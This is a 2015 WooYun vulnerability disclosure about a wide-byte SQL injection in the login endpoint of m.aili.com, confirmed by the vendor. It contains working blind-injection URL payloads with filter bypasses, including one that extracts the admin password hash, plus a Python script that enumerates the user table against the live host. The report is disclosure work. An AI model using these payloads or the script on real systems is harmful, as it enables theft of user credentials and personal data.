当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098961

漏洞标题:爱丽某站宽字节注入及绕过(附验证脚本)可脱用户库

相关厂商:aili.com

漏洞作者: BMa

提交时间:2015-03-02 18:13

修复时间:2015-04-16 18:14

公开时间:2015-04-16 18:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

爱丽某站宽字节注入及绕过<附验证脚本>可脱用户库,得到用户数据库,用户表和列,其实是可以脱裤的
用户数:1433917

详细说明:

m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf'
参数:username
泄露用户表和列:
用户表:dzxbbs_ucenter_members
用户列:uid,username,email,salt,password
所以即使是sqlmap无法跑出数据,也可以用自己的脚本脱裤,

1.jpg


可惜用sqlmap+tamper跑不出来,只能证明存在漏洞:

3.jpg


4.jpg


接下来便是构造盲注,测试发现后台可能存在过滤或者其他防护机制,构造如下语句绕过:
http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0a12=12%0a%23
正确返回:

5.png


错误返回:

6.png


得到version:

7.png


得到user:

8.png


得到数据库:

9.png


查看用户数:

10.png


其中还泄露了一些其他信息:可以得到一些数据库信息:数据库、表、列

xinxi.png


System Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.cannot use database newcmsSystem Maintenance......
Please wait Try.cannot use database2 newcmsSystem Maintenance......
Please wait Try.Invalid SQL: SELECT * FROM channels WHERE iswap = 1 ORDER BY wapsort descSystem Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.stitle,a.ltitle,a.ftitle,a.channel,a.colu,a.tip,a.original,a.url,b.cover FROM (archives a inner JOIN `articles` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.tip!='' and a.posttime < 1425139200 and a.recycled=0 and a.type=0 and a.channel in(1,2,34,50,52,64,48) and a.status=2 and a.pbstatus=0 and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 12System Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.content,b.cover FROM (archives a inner JOIN `images` b ON a.aid = b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=1 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 2System Maintenance......
Please wait Try.Invalid SQL: SELECT a.aid,a.type,a.title,a.url,a.channel,a.colu,b.cover FROM (archives a inner join `albums` b on a.aid=b.aid) inner join columns c ON a.colu = c.cid WHERE a.recycled=0 and a.posttime < 1425139200 and a.type=2 and a.status=2 and a.pbstatus=0 and a.channel in(1,2,34,50,52,64,48) and b.cover!='' and c.isshow!=1 ORDER BY a.posttime DESC LIMIT 0, 5System Maintenance......
Please wait Try.Invalid SQL: SELECT * FROM block WHERE pos = 'app_index_hd'
System Maintenance......
Please wait Try.Link-ID == false, connect failedSystem Maintenance......
Please wait Try.cannot use database newcms


还可以构造查询用户admin的密码:

http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0aascii(mid(lower(SELECT%0apassword%0aFROM%0adzxbbs_ucenter_members%0aWHERE%0ausername%0a=%0a0x61646D696E),1,1))=3%0a%23


漏洞证明:

附验证脚本:

#encoding=utf-8
import httplib
import sys
import random
headers = {}
#payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
payloads = list('0123456789')
print 'Start to retrive MySQL database:'
user = ''
base_url = "/index.php?a=on_global_loginbk&m=member&" + \
"c=wap&callback=jsonp1425083838041&chkcode=e&" + \
"pwd=e1671797c52e15f763380b45e841ec32&username="
for i in range(1,10):
for payload in payloads:
conn = httplib.HTTPConnection('m.aili.com', timeout=60)
s = "%bf%27%0a||%0amid((select%0acount(*)%0afrom%0adzxbbs_ucenter_members),{0},1)={1}%0a%23".format(i,payload)
conn.request(method='GET',
url = base_url + s,
headers=headers)
html_doc = conn.getresponse().read().decode('utf-8')
conn.close()
if html_doc.find(u'error') > 0: # True
user += payload
sys.stdout.write('\r[In Progress]' + user + '\r')
sys.stdout.flush()
break
else:
print 'WAITING...' + str(random.randint(1,100))
print '\n[Done]MySQL ALL users are ' + user

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-02 18:25

厂商回复:

很是执着……

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-03 14:42 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    很是执着

  2. 2015-04-02 13:27 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    很是执着

  3. 2015-04-16 19:48 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    很是执着 真执着。 不挖出来不罢休 厂商都无奈了。

  4. 2015-04-17 10:32 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    一般遇到一个洞,你不挖出来,心痒难耐啊,时不时的要去验证一下新的想法...:)

  5. 2015-09-11 18:40 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    掉翟天